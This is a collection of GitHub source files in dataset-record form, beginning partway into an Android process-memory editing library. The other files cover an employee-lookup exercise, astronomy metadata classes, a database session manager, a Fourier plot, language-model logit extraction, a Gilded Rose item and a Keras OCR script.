as a wildcard for any single hexadecimal digit.\r\n replace_pattern (str): The pattern to replace the found pattern with.\r\n It should be a valid hexadecimal string.\r\n\r\n Returns:\r\n any: The result of the pattern finding and replacement operation.\r\n The format of the result depends on the 'speed_mode' setting.\r\n \"\"\"\r\n\r\n proc_id = super().get_variables(is_pid=True)\r\n maps_addr = super().get_variables(is_map_addr=True)\r\n speed_mode = super().get_variables(is_speed=True)\r\n\r\n filter_user_data = search_pattern.replace(\" \", \"\")\r\n replace_pattern = replace_pattern.replace(\" \", \"\")\r\n bytes_of_filtered_data = int(len(filter_user_data) / 2)\r\n pattern_of_hex = \"\"\r\n character_counter_hex = 0\r\n for char in filter_user_data:\r\n if char == \"?\":\r\n character_counter_hex += 1\r\n else:\r\n if character_counter_hex != 0:\r\n pattern_of_hex += f\"[A-F0-9]{{{character_counter_hex}}}\"\r\n character_counter_hex = 0\r\n if char != \"?\":\r\n pattern_of_hex += char\r\n\r\n if character_counter_hex != 0:\r\n pattern_of_hex += f\"[A-F0-9]{{{character_counter_hex}}}\"\r\n\r\n if speed_mode:\r\n super().fast_search_algorithms_pattern_finding(proc_id, maps_addr, bytes_of_filtered_data,\r\n pattern_of_hex, replace_pattern)\r\n values = self._AdditionalFeaturesObject.get_pattern_finder_values()\r\n self._AdditionalFeaturesObject.reset_queue()\r\n return values\r\n\r\n return AdditionalFeatures.find_and_replace_hexadecimal_pattern(proc_id, maps_addr,\r\n bytes_of_filtered_data, pattern_of_hex,\r\n replace_pattern)\r\n\r\n def dump_maps(self, path=\"./\") -> bool:\r\n \"\"\"\r\n Dumps the memory maps of the process.\r\n\r\n Args:\r\n path: The path to save the dumped file. Defaults to './'.\r\n\r\n Returns:\r\n True if the dump was successful, False otherwise.\r\n \"\"\"\r\n\r\n proc_id = super().get_variables(is_pid=True)\r\n if proc_id:\r\n map_file = open(f\"/proc/{proc_id}/maps\", \"r\").read()\r\n open(f\"{path}Map_{proc_id}.txt\", \"w\").write(map_file)\r\n return True\r\n\r\n return False\r\n","repo_name":"Anonym0usWork1221/android-memorytool","sub_path":"androidMemoryTool/LinuxAPI/android_memory_tool_linux.py","file_name":"android_memory_tool_linux.py","file_ext":"py","file_size_in_byte":23003,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"78"} +{"seq_id":"9648015296","text":"# 处理员工信息\nsource = \"7782,CLARK,MANAGER,SALES,5000$7934,MILLER,SALESMAN,SALES,3000$7369,SMITH,ANALYST,RESEARCH,2000\"\nemployee_list = source.split(\"$\")\nall_emp = {}\n# 创建员工字典\nfor i in range(0, len(employee_list)):\n # 将单个员工信息的字符串切割成列表\n e = employee_list[i].split(\",\")\n # 创建单个员工信息的字典\n employee = {\"no\": e[0], \"name\": e[1], \"job\": e[2], \"department\": e[3], \"salary\": e[4]}\n # 每次循环都将新创建的字典添加到新的字典里面\n all_emp[employee[\"no\"]] = employee\n\nemp_no = input(\"请输入需要查询的员工编号:\")\nif emp_no in all_emp:\n emp = all_emp[emp_no] # 字典取值\n print(\"工号:{no},姓名:{name},职位:{job},部门:{department},薪资:{salary}\".format_map(emp))\nelse:\n print(\"编号错误,请重新输入!\")\n\n\n\n","repo_name":"Anory/Python_projeck","sub_path":"dict_test/sample4.py","file_name":"sample4.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4348403185","text":"from typing import List\nfrom astropy.coordinates import SkyCoord\nfrom star_description import StarMetaData\n\n\nclass UpsilonData(StarMetaData):\n def __init__(\n self, key=\"UPSILON\", var_type=None, probability=None, 
flag=None, period=None\n ):\n super().__init__(key)\n self.var_type = var_type\n self.probability = probability\n self.flag = flag\n self.period = period\n\n def get_upsilon_string(self):\n # extract upsilon strings from star_descr\n # might have to move outside of UpsilonMatch\n return \"\\nVar: prob={0:.2f}({1}),type={2}\".format(\n self.probability, self.flag, self.var_type\n )\n\n def __repr__(self):\n return (\n f\"Key:{self.key}, Var Type:{self.var_type}, Probability:{self.probability},\"\n f\" flag:{self.flag}, Period:{self.period}\"\n )\n\n def __str__(self):\n return (\n f\"Key:{self.key}, Var Type:{self.var_type}, Probability:{self.probability},\"\n f\" flag:{self.flag}, Period:{self.period}\"\n )\n\n\nclass CompStarData(StarMetaData):\n def __init__(self, compstar_ids: List[int], key=\"COMPSTARS\", extra_id=-1):\n super().__init__(key)\n self.compstar_ids = compstar_ids\n # extra star which is also constant, and can be used as K star for AAVSO ensemble calculations\n self.extra_id = extra_id\n\n def __repr__(self):\n return f\"Key:{self.key}, Compstars: {self.compstar_ids}\"\n\n def __str__(self):\n return f\"Key:{self.key}, Compstars: {self.compstar_ids}\"\n\n\nclass SelectedFileData(StarMetaData):\n def __init__(self, key=\"SELECTEDTAG\"):\n super().__init__(key)\n\n\nclass SiteData(StarMetaData):\n def __init__(\n self,\n minmax: str = None,\n vsx_var_flag=None,\n separation: float = None,\n var_min=None,\n var_max=None,\n var_type: str = None,\n our_name: str = None,\n period: float = None,\n period_err: str = None,\n source: str = None,\n epoch: str = None,\n comments: str = None,\n key=\"SITE\",\n ):\n super().__init__(key)\n self.minmax = self._strip_if_string(minmax)\n self.vsx_var_flag = self._strip_if_string(vsx_var_flag)\n self.separation = separation\n self.var_min = var_min\n self.var_max = var_max\n self.var_type = self._strip_if_string(var_type)\n self.our_name = self._strip_if_string(our_name)\n self.period = period\n self.period_err = period_err\n self.source = source\n self.epoch = epoch\n self.comments = comments\n\n @staticmethod\n def _strip_if_string(arg, is_nan=True):\n return arg.strip() if (arg is not None and isinstance(arg, str)) else arg\n\n def __repr__(self):\n return (\n f\"Key:{self.key}, {self.minmax} {self.var_min}-{self.var_max} \"\n f\"{self.var_type} {self.our_name} {self.period} {self.period_err} {self.epoch}\"\n )\n\n def __str__(self):\n return self.__repr__()\n\n\nclass CatalogData(StarMetaData):\n def __init__(\n self,\n key=None,\n catalog_id=None,\n name=None,\n coords: SkyCoord = None,\n separation=-1,\n vmag=None,\n vmag_err=None,\n extradata=None,\n ):\n # the name of the catalog\n super().__init__(key)\n # the id in the catalog\n self.catalog_id = catalog_id\n # the name of the object in this catalog\n self.name = name\n # the coords in the catalog\n self.coords = coords\n # the separation between the vast coords and the catalog coords\n self.separation = separation\n # the visual magnitude\n self.vmag = vmag\n # the visual magnitude error\n self.vmag_err = vmag_err\n # optional extra info on the catalog object\n self.extradata = extradata\n\n def get_name_and_separation(self):\n return self.name, self.separation\n\n def __repr__(self):\n return (\n f\"Catalog:{self.key}, CatalogId:{self.catalog_id}, Name:{self.name}, \"\n f\"Coords:{self.coords}, Separation:{self.separation}\"\n )\n\n def __str__(self):\n return (\n f\"Catalog:{self.key}, CatalogId:{self.catalog_id}, Name:{self.name}, \"\n f\"Coords:{self.coords}, 
Separation:{self.separation}\"\n )\n\n\n#\n# class DataTypes:\n# upsilondata = UpsilonData.key\n# sitedata = SiteData.key\n# compstardata = CompStarData.key\n# selectedfiledata = SelectedFileData.key\n","repo_name":"mrosseel/vast-automation","sub_path":"src/star_metadata.py","file_name":"star_metadata.py","file_ext":"py","file_size_in_byte":4546,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"12030351861","text":"\"\"\"\nSessionManager class\n\"\"\"\nfrom __future__ import annotations\n\nfrom typing import Any, Dict\n\nimport json\nimport time\n\nfrom asyncache import cached\nfrom cachetools import TTLCache\nfrom pydantic import BaseModel\n\nfrom featurebyte.enum import SourceType\nfrom featurebyte.logging import get_logger\nfrom featurebyte.models.credential import CredentialModel\nfrom featurebyte.models.feature_store import FeatureStoreModel\nfrom featurebyte.query_graph.node.schema import DatabaseDetails\nfrom featurebyte.session.base import BaseSession\nfrom featurebyte.session.databricks import DatabricksSession\nfrom featurebyte.session.snowflake import SnowflakeSession\nfrom featurebyte.session.spark import SparkSession\nfrom featurebyte.session.sqlite import SQLiteSession\n\nSOURCE_TYPE_SESSION_MAP = {\n SourceType.SQLITE: SQLiteSession,\n SourceType.SNOWFLAKE: SnowflakeSession,\n SourceType.DATABRICKS: DatabricksSession,\n SourceType.SPARK: SparkSession,\n}\n\nsession_cache: TTLCache[Any, Any] = TTLCache(maxsize=1024, ttl=600)\n\n\nlogger = get_logger(__name__)\n\n\nasync def get_new_session(item: str, credential_params: str) -> BaseSession:\n \"\"\"\n Create a new session for the given database source key\n\n Parameters\n ----------\n item: str\n JSON dumps of feature store type & details\n credential_params: str\n JSON dumps of credential parameters used to initiate a new session\n\n Returns\n -------\n BaseSession\n Newly created session\n \"\"\"\n tic = time.time()\n item_dict = json.loads(item)\n logger.debug(f'Create a new session for {item_dict[\"type\"]}')\n credential_params_dict = json.loads(credential_params)\n session = SOURCE_TYPE_SESSION_MAP[item_dict[\"type\"]]( # type: ignore\n **item_dict[\"details\"], **credential_params_dict\n )\n await session.initialize()\n logger.debug(f\"Session creation time: {time.time() - tic:.3f}s\")\n return session\n\n\n@cached(cache=session_cache)\nasync def get_session(item: str, credential_params: str) -> BaseSession:\n \"\"\"\n Retrieve or create a new session for the given database source key. 
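# Each metadata class above hand-writes matching __repr__/__str__ pairs. The
# dataclasses module can generate an equivalent repr automatically; a trimmed,
# hypothetical stand-in (not the module's real class hierarchy):
from dataclasses import dataclass
from typing import Optional

@dataclass
class UpsilonLite:
    key: str = "UPSILON"
    var_type: Optional[str] = None
    probability: Optional[float] = None

print(UpsilonLite(var_type="RR", probability=0.93))
# UpsilonLite(key='UPSILON', var_type='RR', probability=0.93)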
If a new session is created,\n it will be cached.\n\n Parameters\n ----------\n item: str\n JSON dumps of feature store type & details\n credential_params: str\n JSON dumps of credential parameters used to initiate a new session\n\n Returns\n -------\n BaseSession\n Retrieved or created session object\n \"\"\"\n return await get_new_session(item, credential_params)\n\n\nclass SessionManager(BaseModel):\n \"\"\"\n Session manager to manage session of different database sources\n \"\"\"\n\n credentials: Dict[str, CredentialModel]\n\n async def get_session_with_params(\n self, feature_store_name: str, session_type: SourceType, details: DatabaseDetails\n ) -> BaseSession:\n \"\"\"\n Retrieve or create a new session for the given database source key\n\n Parameters\n ----------\n feature_store_name: str\n feature store name\n session_type: SourceType\n session type\n details: DatabaseDetails\n database details\n\n Returns\n -------\n BaseSession\n Session that can be used to connect to the specified database\n\n Raises\n ------\n ValueError\n When credentials do not contain the specified data source info\n \"\"\"\n if feature_store_name in self.credentials:\n credential = self.credentials[feature_store_name]\n elif session_type not in SourceType.credential_required_types():\n credential = None\n else:\n raise ValueError(\n f'Credentials do not contain info for the feature store \"{feature_store_name}\"!'\n )\n\n credential_params = (\n {\n key: value\n for key, value in credential.json_dict().items()\n if key in [\"database_credential\", \"storage_credential\"]\n }\n if credential\n else {}\n )\n\n json_str = json.dumps(\n {\n \"type\": session_type,\n \"details\": details.json_dict(),\n },\n sort_keys=True,\n )\n if SOURCE_TYPE_SESSION_MAP[session_type].is_threadsafe():\n get_session_func = get_session\n else:\n get_session_func = get_new_session\n session = await get_session_func(\n item=json_str,\n credential_params=json.dumps(credential_params, sort_keys=True),\n )\n assert isinstance(session, BaseSession)\n return session\n\n async def get_session(self, item: FeatureStoreModel) -> BaseSession:\n \"\"\"\n Retrieve or create a new session for the given database source key\n\n Parameters\n ----------\n item: FeatureStoreModel\n Database source object\n\n Returns\n -------\n BaseSession\n Session that can be used to connect to the specified database\n \"\"\"\n return await self.get_session_with_params(item.name, item.type, item.details)\n","repo_name":"featurebyte/featurebyte","sub_path":"featurebyte/session/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"78"} +{"seq_id":"2846718691","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef A(n):\n return 1/(4*n**2 - 1) \n\n\nfig,ax = plt.subplots(nrows=1,ncols=1,figsize=(7,5))\n\nx = np.linspace(0,np.pi,100)\nf1 = np.abs(np.sin(x))\nax.plot(x,f1,'k--',label=r'$x^{2}$')\n\nf = 2/np.pi + np.zeros(len(x))\nfor m in range(1,5):\n f += 4/np.pi*A(m)*np.cos(m*x)\n 
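# The session-manager record above memoizes sessions in a cachetools TTLCache
# through asyncache's @cached. The same memoization in a synchronous sketch
# using cachetools' own decorator (expensive_connect is a stand-in):
from cachetools import TTLCache, cached

calls = []

@cached(cache=TTLCache(maxsize=1024, ttl=600))
def expensive_connect(url: str) -> str:
    calls.append(url)                  # track real connection attempts
    return f"session-for-{url}"

expensive_connect("db://a")
expensive_connect("db://a")            # served from cache within the TTL
print(len(calls))                      # 1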
ax.plot(x,f,label=r'$S_{%d}$'%m)\n\nax.set_xlabel(r'$x$',size=20)\nax.set_ylabel(r'$y$',size=20)\nax.legend(fontsize=15)\n#fig.savefig('prob5_1_4.pdf',bbox_inches='tight')\nplt.show()\n\n\n","repo_name":"rwhitehill/Partial-Differential-Equations22","sub_path":"HW5/prob5_1_4.py","file_name":"prob5_1_4.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34185802556","text":"\"\"\"Utilities to extract LM representations.\"\"\"\nimport deepspeed\nimport numpy as np\nimport torch\n\nfrom math import ceil\n\nfrom megatron import print_rank_0\n\n\ndef extract_forward_step(neox_args, data_iterator, model, \n get_batch_fn, batch_output_key=\"source\"):\n \"\"\"Eval forward step that only outputs logits and token sources, no loss.\"\"\"\n if neox_args.is_pipe_parallel:\n return model.inference_extract(data_iterator) #, return_logits=True)\n else:\n raise ValueError(\"Model is not pipe parallel!\")\n\n # Error: when we converted loaded pipeline model to sequential, we get a Half/Float error\n # seems to be due to the differences in devices? LayerNorm is on CPU while attention is on CUDA, and\n # torch 1.8.1 doesn't support bfloat16 yet...\n\n # Generate a batch, assuming a pipeline.\n # if timers is not None:\n # timers(\"batch generator\").start()\n # data = next(data_iterator)\n # (tokens, position_ids, attention_mask), (labels, loss_mask) = \\\n # get_batch_fn(data, neox_args=neox_args)\n # if timers is not None:\n # timers(\"batch generator\").stop()\n\n # # Get the batch.\n # if timers is not None:\n # timers(\"batch generator\").start()\n # tokens, (labels, _), attention_mask, position_ids = get_batch_fn(\n # neox_args=neox_args, data_iterator=data_iterator\n # )\n # if timers is not None:\n # timers(\"batch generator\").stop()\n #\n # import pdb; pdb.set_trace()\n # output = model((tokens, position_ids, attention_mask))\n # out_labels = tokens[batch_output_key] if batch_output_key else None\n\n # return output, labels\n\n\ndef extract_loop(\n neox_args,\n model,\n data_iterator,\n data_iter2,\n eval_batch_fn,\n output_dir,\n batch_data_key=None,\n max_seq_length=2048,\n verbose=True,\n samples_per_split_bin=None\n):\n \"\"\"\n Simply run the data through the model and extract the logit representations.\n\n eval_batch_fn: custom batching function to use in an evaluation loop\n output_dir: where to store the output representations\n batch_data_key: the key in the dataset batch that needs to be stored along with the representations\n \"\"\"\n # assert not neox_args.is_pipe_parallel, \"Please turn pipe parallelism off to extract logits\"\n num_samples = len(data_iterator)\n flush_write_period = 100\n total_iters = int(ceil(num_samples / neox_args.batch_size))\n\n model.eval()\n # Evaluation loop\n iteration = 0\n i, j = 0, 0\n with torch.no_grad():\n while True:\n if verbose and iteration % neox_args.log_interval == 0:\n print_rank_0(\n \"Evaluating iter {}/{}\".format(iteration, total_iters)\n )\n try:\n prefix = \"iteration {}\".format(iteration)\n logits = extract_forward_step(neox_args, data_iterator, model, \n eval_batch_fn, batch_data_key)\n logits = logits.cpu().numpy()\n data = next(data_iter2)\n data_tokens = data['input_ids'].squeeze(1)\n if data_tokens.ndim > 2:\n data_tokens = data_tokens.squeeze()\n assert data_tokens.ndim == 2\n assert logits.shape[0] == data_tokens.shape[0], f\"Batch sizes don't match!\"\n assert logits.shape[1] == data_tokens.shape[1], f\"Sequence lengths don't 
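# The Fourier plot above sums 4/pi * A(m) * cos(m*x) against |sin x|. For
# reference, the textbook cosine series for |sin x| on [0, pi] is
#   |sin x| = 2/pi - (4/pi) * sum_{n>=1} cos(2*n*x) / (4*n^2 - 1),
# i.e. cos(2*n*x) with a minus sign; a quick numerical check of that form:
import numpy as np

x = np.linspace(0, np.pi, 100)
f = 2 / np.pi + np.zeros_like(x)
for n in range(1, 50):
    f -= 4 / np.pi * np.cos(2 * n * x) / (4 * n**2 - 1)
print(np.max(np.abs(f - np.abs(np.sin(x)))) < 1e-2)   # True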
match!\"\n text_labels = data['source']\n if isinstance(text_labels[0], list) and len(text_labels) == 1:\n text_labels = text_labels[0]\n assert logits.shape[0] == len(text_labels), \"Batch size of logits doesn't match label data\"\n except StopIteration: # out of data\n print(\"We're out of data!\")\n break\n except Exception as e:\n print(e)\n import pdb; pdb.set_trace()\n if iteration == 0:\n print_rank_0(\"Creating memory mapped tensors...\")\n if samples_per_split_bin:\n seq_bins = np.append(np.array(list(samples_per_split_bin.keys())), np.array([0]))\n seq_bin_count = list(samples_per_split_bin.values())\n output = [None] * len(seq_bin_count)\n for b, (seq_max, n_bin_samples) in enumerate(zip(seq_bins[:-1], seq_bin_count)):\n tensor_shape = [n_bin_samples, seq_max, logits.shape[-1]]\n output[b] = np.memmap(f\"{output_dir}/extracted_tensors_{seq_max}.npy\", dtype=np.float32,\n mode='w+', shape=tuple(tensor_shape))\n print_rank_0(f\"Tensor with shape {tensor_shape}\")\n else:\n tensor_shape = [num_samples, max_seq_length, logits.shape[-1]]\n output = np.memmap(f\"{output_dir}/extracted_tensors.npy\", dtype=np.float32,\n mode='w+', shape=tuple(tensor_shape))\n print_rank_0(f\"Tensor with shape {tensor_shape}\")\n if batch_data_key:\n if samples_per_split_bin:\n path_dict = {}\n for b, (seq_max, n_bin_samples) in enumerate(zip(seq_bins[:-1], seq_bin_count)):\n path_dict[b] = np.array([None]*n_bin_samples, dtype=object)\n else:\n path_array = np.array([None]*num_samples, dtype=object)\n this_batch_size, this_seq_length = logits.shape[0:2]\n if samples_per_split_bin:\n bin_id = np.digitize(np.array(this_seq_length), seq_bins) - 1\n i = j\n j = i + this_batch_size\n output[bin_id][i:j, :this_seq_length, :] = logits\n if batch_data_key:\n path_dict[bin_id][i:j] = text_labels\n if j == output[bin_id].shape[0]:\n print_rank_0(\"Resetting indices for next memmap tensor...\")\n i, j = 0, 0\n # print_rank_0(i, j)\n else:\n i = j\n j = i + this_batch_size\n output[i:j, :this_seq_length, :] = logits\n if batch_data_key:\n path_array[i:j] = text_labels\n # When contiguous memory optimizations are enabled, the buffers\n # allocated by the optimizations are deallocated during backward pass\n # in the absence of backward pass the buffers should be reset after each\n # forward pass\n if neox_args.deepspeed and neox_args.deepspeed_activation_checkpointing:\n deepspeed.checkpointing.reset()\n iteration += 1\n if (iteration % flush_write_period) == 0:\n print(f\"Flushing data to {output_dir} at {iteration}/{total_iters} iterations...\")\n if samples_per_split_bin:\n for f_output in output:\n f_output.flush()\n if batch_data_key:\n np.savez(f\"{output_dir}/source_paths.npz\", path_dict)\n else:\n output.flush()\n if batch_data_key:\n np.savez(f\"{output_dir}/source_paths.npz\", path_array)\n # Save one last time!\n if samples_per_split_bin:\n for f_output in output:\n f_output.flush()\n if batch_data_key:\n np.savez(f\"{output_dir}/source_paths.npz\", path_dict)\n else:\n output.flush()\n if batch_data_key:\n np.savez(f\"{output_dir}/source_paths.npz\", path_array)\n print(f\"Finished writing data to {output_dir}!\")\n\n","repo_name":"vyaivo/code-lms","sub_path":"polycoder/tasks/extract_utils.py","file_name":"extract_utils.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31206686600","text":"from src.normal_item import *\n\nclass Backstage(NormalItem):\n \n def __init__(self, name, sell_in, quality):\n 
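# extract_loop above streams logits into a disk-backed np.memmap so the full
# tensor never has to fit in RAM, flushing periodically. A tiny demo of that
# pattern (the file name is arbitrary):
import numpy as np

out = np.memmap("demo_tensor.npy", dtype=np.float32, mode="w+", shape=(4, 3))
for i in range(4):
    out[i] = np.arange(3) + i      # simulate writing one batch of results
out.flush()                        # persist to disk, as the loop does

back = np.memmap("demo_tensor.npy", dtype=np.float32, mode="r", shape=(4, 3))
print(back[2])                     # [2. 3. 4.]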
Item.__init__(self, name, sell_in, quality)\n \n def updateQuality(self):\n if self.sell_in > 10:\n self.setQuality(1)\n elif self.sell_in > 5:\n self.setQuality(2)\n elif self.sell_in > 0:\n self.setQuality(3)\n else:\n self.quality = 0\n self.setSell_in()","repo_name":"SPiedra955/Gilded-Rose","sub_path":"gildedRosePy/src/backstageItem.py","file_name":"backstageItem.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16353752136","text":"#!/usr/bin/env python\n\nimport sys\n\nclass readFeaturePython:\n \n def __init__(self, fileName):\n self.fileName = fileName\n self.feature = {}\n\n def feature_Read(self):\n f = open(self.fileName, 'r')\n words = []\n for line in f:\n rline = line.replace(\"\\n\",\"\")\n label = rline.split(\"\\t\")\n words = label[1].split(\" \")\n join_words = \" \".join(words)\n self.feature.update({label[0]:join_words})\n f.close()\n","repo_name":"SnowMasaya/MachineLearning_Python","sub_path":"NLP_perceptron/file_read_feature.py","file_name":"file_read_feature.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"35283362837","text":"import os\r\nfrom xml.etree import ElementTree\r\nimport cv2\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.callbacks import ModelCheckpoint\r\n#from tensorflow.keras.applications.densenet import DenseNet121\r\n#from vgg import vgg_model\r\nfrom tensorflow.keras.models import Model, load_model, Sequential\r\nfrom tensorflow.keras.layers import Conv2D, Layer,Input, Dense,Flatten , UpSampling2D, GlobalAveragePooling2D, GlobalMaxPooling2D,MaxPooling2D\r\nfrom tensorflow.keras import backend as K\r\nfrom sklearn.utils import shuffle\r\nimport random\r\nimport cv2\r\nfrom scipy.ndimage.measurements import label\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.ndimage import binary_dilation\r\nimport os\r\nfrom keras.utils.vis_utils import plot_model\r\n\r\n\r\n#Classification\r\nclasses = ['0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F','G','H',\r\n 'I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\r\n\r\n\r\ninp = Input(shape=(64,32,3))\r\nx = Conv2D(32,3, padding = 'same', activation = 'relu')(inp)\r\nx = MaxPooling2D(2)(x)\r\nx = Conv2D(64,3, padding = 'same', activation = 'relu')(x)\r\nx = MaxPooling2D(2)(x)\r\nx = Conv2D(128,3, padding = 'same', activation = 'relu')(x)\r\nx = Flatten()(x)\r\nx = Dense(512, activation= 'relu')(x)\r\nx = Dense(256, activation= 'relu')(x)\r\nx = Dense(128, activation= 'relu')(x)\r\nx = Dense(64, activation= 'relu')(x)\r\nout = Dense(36, activation= 'softmax')(x)\r\nmodel = Model(inputs = inp, outputs = out)\r\n# model.load_weights('D:/Heejoo/cont_ocr/weights/weights-improvement-408-0.9999.h5')\r\n\r\nplot_model(model, to_file='model_plot.png', show_shapes=True, show_layer_names=True)\r\n#Binary box detection\r\npath = 'D:/Heejoo/cont_ocr/horizontal/'\r\nimages = os.listdir(path)\r\nfor image in images:\r\n print(image)\r\n originalImage = cv2.imread(path+image)\r\n img_h, img_w, _ = originalImage.shape\r\n grayImage = cv2.cvtColor(originalImage, cv2.COLOR_BGR2GRAY)\r\n\r\n print('img size', img_h*img_w)\r\n #(thresh, blackAndWhiteImage) = cv2.threshold(grayImage, 127, 255, cv2.THRESH_BINARY)\r\n region_type = 1\r\n if region_type == 1:\r\n size_thr = 0.0055\r\n else:\r\n size_thr = 0.002\r\n blur = 
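# Backstage above is declared as a NormalItem subclass but calls Item.__init__
# directly, bypassing whatever NormalItem's own __init__ sets up. A sketch of
# the cooperative alternative (these stub classes are illustrative, not the
# repo's real ones):
class Item:
    def __init__(self, name, sell_in, quality):
        self.name, self.sell_in, self.quality = name, sell_in, quality

class NormalItem(Item):
    def __init__(self, name, sell_in, quality):
        super().__init__(name, sell_in, quality)

class Backstage(NormalItem):
    def __init__(self, name, sell_in, quality):
        super().__init__(name, sell_in, quality)   # runs the full chain

print(Backstage("pass", 12, 20).quality)           # 20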
cv2.GaussianBlur(grayImage,(5,5),0)\r\n (thresh, blackAndWhiteImage) = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\r\n\r\n white_pix = np.where(blackAndWhiteImage == 255)\r\n\r\n if len(white_pix[0]) > 0.5*img_h*img_w:\r\n blackAndWhiteImage = cv2.bitwise_not(blackAndWhiteImage)\r\n\r\n filter = np.ones((3, 3), dtype=np.int)\r\n labeled, regions = label(blackAndWhiteImage, filter)\r\n\r\n #labeled, regions = label(blackAndWhiteImage, filter)\r\n loc_new = {}\r\n size_mean = 0\r\n height_mean = 0\r\n width_mean = 0\r\n #vertical separation\r\n if region_type == 0:\r\n if img_h > 2.5*img_w :\r\n half_img = blackAndWhiteImage[0:img_h,int(img_w/2):img_w]/255.0\r\n # cv2.imshow('test',half_img)\r\n # cv2.waitKey(0)\r\n # cv2.destroyAllWindows()\r\n dial_h = int(img_h/50)\r\n a = np.zeros((dial_h, dial_h))\r\n\r\n a[0:dial_h, int(dial_h/2)] = 1\r\n half_img = binary_dilation(half_img, structure=a).astype(half_img.dtype)\r\n\r\n labeled2, regions2 = label(half_img, filter)\r\n max_h = 0\r\n for n in range(regions2):\r\n loc_half = np.where(labeled2 == n+1)\r\n region_h = len(np.unique(loc_half[0]))\r\n if region_h >= max_h:\r\n max_h = region_h\r\n max_reg= n+1\r\n print('max;',max_reg)\r\n\r\n for n in range(regions2):\r\n if n+1 != max_reg:\r\n loc_half = np.where(labeled2 == n+1)\r\n blackAndWhiteImage[loc_half[0],loc_half[1]+int(img_w/2)] = 0\r\n # cv2.imshow('test', blackAndWhiteImage)\r\n # cv2.waitKey(0)\r\n # cv2.destroyAllWindows()\r\n #cv2.imshow('half image',half_img)\r\n # cv2.imwrite('half image.png',half_img)\r\n labeled, regions = label(blackAndWhiteImage, filter)\r\n\r\n #print(regions)\r\n for i in range(regions):\r\n loc = np.where(labeled == i+1)\r\n box_h = (np.amax(loc[0]) - np.amin(loc[0])) // (img_h/12)\r\n if box_h >= 1 and img_h > 2.5*img_w:\r\n for k in range(int(box_h)):\r\n blackAndWhiteImage[loc[0][0]+(int(img_h/12.5)*(k+1)),np.unique(loc[1])]= 0\r\n labeled, regions = label(blackAndWhiteImage, filter)\r\n for i in range(regions):\r\n loc = np.where(labeled == i+1)\r\n size = len(np.unique(loc[0]))*len(np.unique(loc[1]))\r\n size_mean += size\r\n height_mean += len(np.unique(loc[0]))\r\n width_mean += len(np.unique(loc[1]))\r\n if size < size_thr*img_h*img_w or len(np.unique(loc[0])) < (img_h/22):\r\n blackAndWhiteImage[loc] = 0\r\n size_mean /= regions\r\n width_mean /= regions\r\n labeled, regions = label(blackAndWhiteImage, filter)\r\n # for i in range(regions):\r\n # loc = np.where(labeled == i+1)\r\n # #size = len(np.unique(loc[0]))*len(np.unique(loc[1]))\r\n # if len(np.unique(loc[1])) >= 1.25*width_mean: #or len(np.unique(loc[0])) <= height_mean:\r\n # blackAndWhiteImage[loc[0],int((np.max(loc[1])-np.min(loc[1]))/2)] = 0\r\n # labeled, regions = label(blackAndWhiteImage, filter)\r\n for i in range(regions):\r\n loc = np.where(labeled == i+1)\r\n loc_new.update({i :np.amin(loc[0])})\r\n\r\n loc_sorted = {k: v for k, v in sorted(loc_new.items(), key=lambda item: item[1])}\r\n region= []\r\n box_min= []\r\n for key, value in loc_sorted.items():\r\n region.append(key)\r\n box_min.append(value)\r\n print(region)\r\n boxes = False\r\n count = 0\r\n\r\n for j in range(len(region)):\r\n loc = np.where(labeled == (region[j]+1))\r\n wide = np.amax(loc[1]) - np.amin(loc[1])\r\n high = np.amax(loc[0]) - np.amin(loc[0])\r\n try:\r\n loc2 = np.where(labeled == (region[j+1]+1))\r\n except:\r\n loc2 = np.array([0,0])\r\n if boxes == True:\r\n boxes = False\r\n continue 
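# The OCR pass above binarizes with Otsu, labels connected components with
# scipy.ndimage, and drops components below a size threshold. That filtering
# step on a toy binary image (the blobs and threshold are made up):
import numpy as np
from scipy.ndimage import label

img = np.zeros((8, 8), dtype=np.uint8)
img[1:3, 1:3] = 1                  # small 2x2 blob (noise)
img[4:8, 3:8] = 1                  # larger 4x5 blob (a character)
labeled, regions = label(img, structure=np.ones((3, 3), dtype=int))
for i in range(1, regions + 1):
    loc = np.where(labeled == i)
    size = len(np.unique(loc[0])) * len(np.unique(loc[1]))
    if size < 6:                   # drop components below the size threshold
        img[loc] = 0
print(int(img.sum()))              # 20 -> only the large blob survives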
